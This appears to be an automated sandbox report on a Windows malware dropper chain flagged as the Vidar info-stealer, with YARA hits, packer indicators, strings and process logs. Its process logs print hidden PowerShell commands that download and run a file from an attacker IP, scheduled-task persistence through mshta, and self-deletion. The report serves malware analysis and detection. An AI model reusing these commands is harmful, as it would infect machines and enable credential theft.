Source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: m0wsoI3[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: m0wsoI3.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: M6gQuZPvgY.exe Static PE information: Section: zwbixhzy ZLIB complexity 0.9943893748127061
Source: rapes.exe.0.dr Static PE information: Section: zwbixhzy ZLIB complexity 0.9943893748127061
Source: UD49QH6[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9994006849315068
Source: UD49QH6[1].exe.6.dr Static PE information: Section: nafweblw ZLIB complexity 0.9946239951615361
Source: UD49QH6.exe.6.dr Static PE information: Section: ZLIB complexity 0.9994006849315068
Source: UD49QH6.exe.6.dr Static PE information: Section: nafweblw ZLIB complexity 0.9946239951615361
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.998999091066482
Source: random[1].exe0.6.dr Static PE information: Section: zzezzonx ZLIB complexity 0.9948263598127284
Source: c1f0508103.exe.6.dr Static PE information: Section: ZLIB complexity 0.998999091066482
Source: c1f0508103.exe.6.dr Static PE information: Section: zzezzonx ZLIB complexity 0.9948263598127284
Source: random[2].exe.6.dr Static PE information: Section: lmgreshx ZLIB complexity 0.994475076311426
Source: 83f34278c7.exe.6.dr Static PE information: Section: lmgreshx ZLIB complexity 0.994475076311426
Source: random[1].exe1.6.dr Static PE information: Section: jtqqduow ZLIB complexity 0.9945868862443779
Source: 0629403be8.exe.6.dr Static PE information: Section: jtqqduow ZLIB complexity 0.9945868862443779
Source: random[1].exe2.6.dr Static PE information: Section: tojgfqvj ZLIB complexity 0.9946281566625729
Source: d101bd5267.exe.6.dr Static PE information: Section: tojgfqvj ZLIB complexity 0.9946281566625729
Source: cronikxqqq[1].exe.15.dr Static PE information: Section: .CSS ZLIB complexity 1.0003273242728532
Source: cronikxqqq.exe.15.dr Static PE information: Section: .CSS ZLIB complexity 1.0003273242728532
Source: v7942[1].exe.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003622159090908
Source: v7942.exe.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003622159090908
Source: crypted.7[1].exe.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: crypted.exe.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: crypted.41[1].exe.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: crypted.exe0.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: mrwipre12[1].exe.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003352171985815
Source: mrwipre12.exe.15.dr Static PE information: Section: .bss ZLIB complexity 1.0003352171985815
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr Static PE information: Section: zwbixhzy ZLIB complexity 0.9943893748127061
Source: libcrypto-3.dll.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9989805572769122
Source: libssl-3.dll.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9920756022135416
Source: python311.dll.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9993348982785603
Source: pythoncom311.dll.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9892076567220544
Source: unicodedata.pyd.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9945956541218638
Source: _cffi.cp311-win_amd64.pyd.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9908387947570333
Source: _imaging.cp311-win_amd64.pyd.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9978805954391892
Source: _imagingft.cp311-win_amd64.pyd.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9979953670705631
Source: _webp.cp311-win_amd64.pyd.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9907634636167147
Source: win32ui.pyd.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9937741537846482
Source: backend_c.cp311-win_amd64.pyd.35.dr Static PE information: Section: UPX1 ZLIB complexity 0.9894116950757575
Source: random[1].exe1.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 0629403be8.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@112/196@0/14
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B37B5 GetLastError,FormatMessageW,18_2_006B37B5
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A10BF AdjustTokenPrivileges,CloseHandle,18_2_006A10BF
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_006A16C3
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,18_2_006B51CD
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 18_2_006CA67C
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize | 18_2_006B648E
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource | 18_2_006442A2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4780
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | File created: C:\Users\user\AppData\Local\Temp\bb556cff4a
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: m0wsoI3.exe, m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: m0wsoI3.exe, m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT ALL id FROM %s;
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: UD49QH6.exe, 00000010.00000003.1420564482.0000000005B87000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1433395613.0000000005B8E000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1421639776.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1433531574.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000003.1493556007.000000000066D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: m0wsoI3.exe, m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: M6gQuZPvgY.exe | Virustotal: Detection: 60%
Source: M6gQuZPvgY.exe | ReversingLabs: Detection: 61%
Source: M6gQuZPvgY.exe | String found in binary or memory: " /add
Source: M6gQuZPvgY.exe | String found in binary or memory: " /add /y
Source: M6gQuZPvgY.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: amnew.exe | String found in binary or memory: " /add /y
Source: amnew.exe | String found in binary or memory: " /add
Source: futors.exe | String found in binary or memory: " /add /y
Source: futors.exe | String found in binary or memory: " /add
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | File read: C:\Users\user\Desktop\M6gQuZPvgY.exe
Source: unknown | Process created: C:\Users\user\Desktop\M6gQuZPvgY.exe "C:\Users\user\Desktop\M6gQuZPvgY.exe"
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe"
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE "C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Process created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\J9hHfTRUK.hta"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Process created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 888
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\J9hHfTRUK.hta"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe"
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\Conhost.exe
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
